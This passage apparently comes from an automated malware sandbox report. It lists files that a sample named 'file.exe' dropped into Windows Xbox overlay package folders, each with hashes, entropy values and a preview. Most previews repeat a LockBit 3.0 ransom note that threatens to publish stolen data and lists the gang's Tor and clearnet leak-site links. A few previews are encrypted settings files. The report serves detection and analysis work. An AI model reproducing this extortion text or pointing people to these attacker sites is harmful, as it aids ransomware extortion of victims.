                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.97887081767326
                Encrypted:false
                SSDEEP:192:iUJbUfQqc9WvlWzQ47aP5X/Wd0juASJZzvXHL1qpo:z+QZW4zXaP5+d0juA2xPhqi
                MD5:01F9DDB908149568410F5129A14BCBA6
                SHA1:D55F31CBB5F853D76808B3B3B28497F979DF3EF8
                SHA-256:3A23303B478E7495E48A74EC4D25F5A4F22D7F16D291F21148DF50C5DF7AF0E0
                SHA-512:C2B6479DE7312B18FC6266F5D1AB94D881E40D986E577CE65D36EE82A14E54BAB5705AA382EA918ED612D367AA8676906A48F2683FC5206DBF621FB1C1AE6C38
                Malicious:false
                Preview:R....jg...#...K..zu..G~.=XE.)37.\.1\=....z...j...)...faAgt.g>.x9.6M.D._...XM.}E.z......,...d.d.S.,W.`...bM.t."....h.."z.}KI#H.0..n6*..L..M.r...e.0.T....._..fozu.......9..Ewj...L.]."...xOA8..;..\....4o5vw$.......W..0m...}.#..m._...*.\M.?.9,...o.....G.Q..I.......!...o.M<^..d..`..Nn(..N.........Cjt...8.....:...t;.~!...g....mz9....h..A3...v.....{L..;i}.f."..6tx.G2t....L.d..a..s].B....5B.. G..w..8';.v.........D.m..?1..2:<T.FmJ....,.t..\.;G..7.2....f....sk>.........HH..........}.gv@gP.....nm....Fz-l.M.Hf.....{.y...,.V|.......W..4].q5...j{_...J...r.!.........P..{3...".......Ls..C6su..].er..).....v.B..e..$...y..t..F......Q/.@D..../....P...P../7..r&<e.e.2>TrO..a.H.Y.;l..........*..p..e*......!.r.......[...G...Bb.RTB......@...T^(..,...&+Z..w%hp..T...B....{Ri.S...1....l.....%......s.C>C..S.7.G.....5...C.$.Iv..;.i.T..T^/.......P(..F....WA.A......,.%.$K..0.6o...u<.....$v...i...u..*.....8.......|"...i........N;.O.D7. .L...m.....:()b.....A..a.%....g..

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.9772812135133515
                Encrypted:false
                SSDEEP:192:ceitiiZTIOzuMLdy9BozeyPXE0x5w9ftXYjX87F5gwmlo:piP3vLdy92iQXE0xEftojM7FiR+
                MD5:3D4013B6E6C24B0782523A49FAC73D97
                SHA1:8A5F92991C087F43D992C53A1563236E907F32CD
                SHA-256:B75779967FD5875A0B23D43B9F5BEC3E7BE6A9D1F549A334DE19EF70B9C6CFEF
                SHA-512:8994D876834DD57A6DC738BC56D72008C5F7544B452C1B0DE7AD44E2CF69E2C93E1E8E302193BA45096990C0610865FFFE946E379F7DDFE0BCD339BEDE3D47D2
                Malicious:false
                Preview:.556"....o.{i".i.fv.......*r.2.z.`...6.......?..-..`o..D..|/..{...U...o.[A.WGC,=5W8..7I..h...a.q^5..o......... )...G.~I.(.....X.?c .m:q..G..L\\..........8....^..s.F.u....I.f..%K3......T&.3..}......el...[...q..O.......Km..,.....%.{f}...E/..!.......B..u.:.+......T...6=.v.K.u.o.<....`...RM.f..>.U...kMz2].F.:..c.SO^`..IV.....o..g.-.g.8.L...jc..%i~."...?..i.-..>..v.t..........I.U....2.O....0....`P.. ....D.....]....<.?.............z....4..N..f..._.../..T<.c.B.x..!$.'.B.<.&w.T..$.i.....h..I..tB.r4[i..G.w.P...P...e....^*.w.tr[.w.b..;.#..Z.n.n...m9.q.)........?..}t....t.`......R...]..........mI.-~.:.[...>.I.0....*'...|.@dW...;.-.u.R.T...6.Y.;b. ....R......6..z.7~..<.hQ...*..~K.B-Q<...2.t...l.....7..(.K8..4.&"..A....Jz...8.......qUy$.I.2X.D..jo=A....|..m..A ......$.W.]......Zk.fpC.z.."..H.z.@.....5|.N5..T.Hm.3P..... .B..'.......|.*ty.........M...=...`s[.....Bd*c.Xp...$.j,e......-.......}%..K.21.hV...:.9U.?...........^X

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
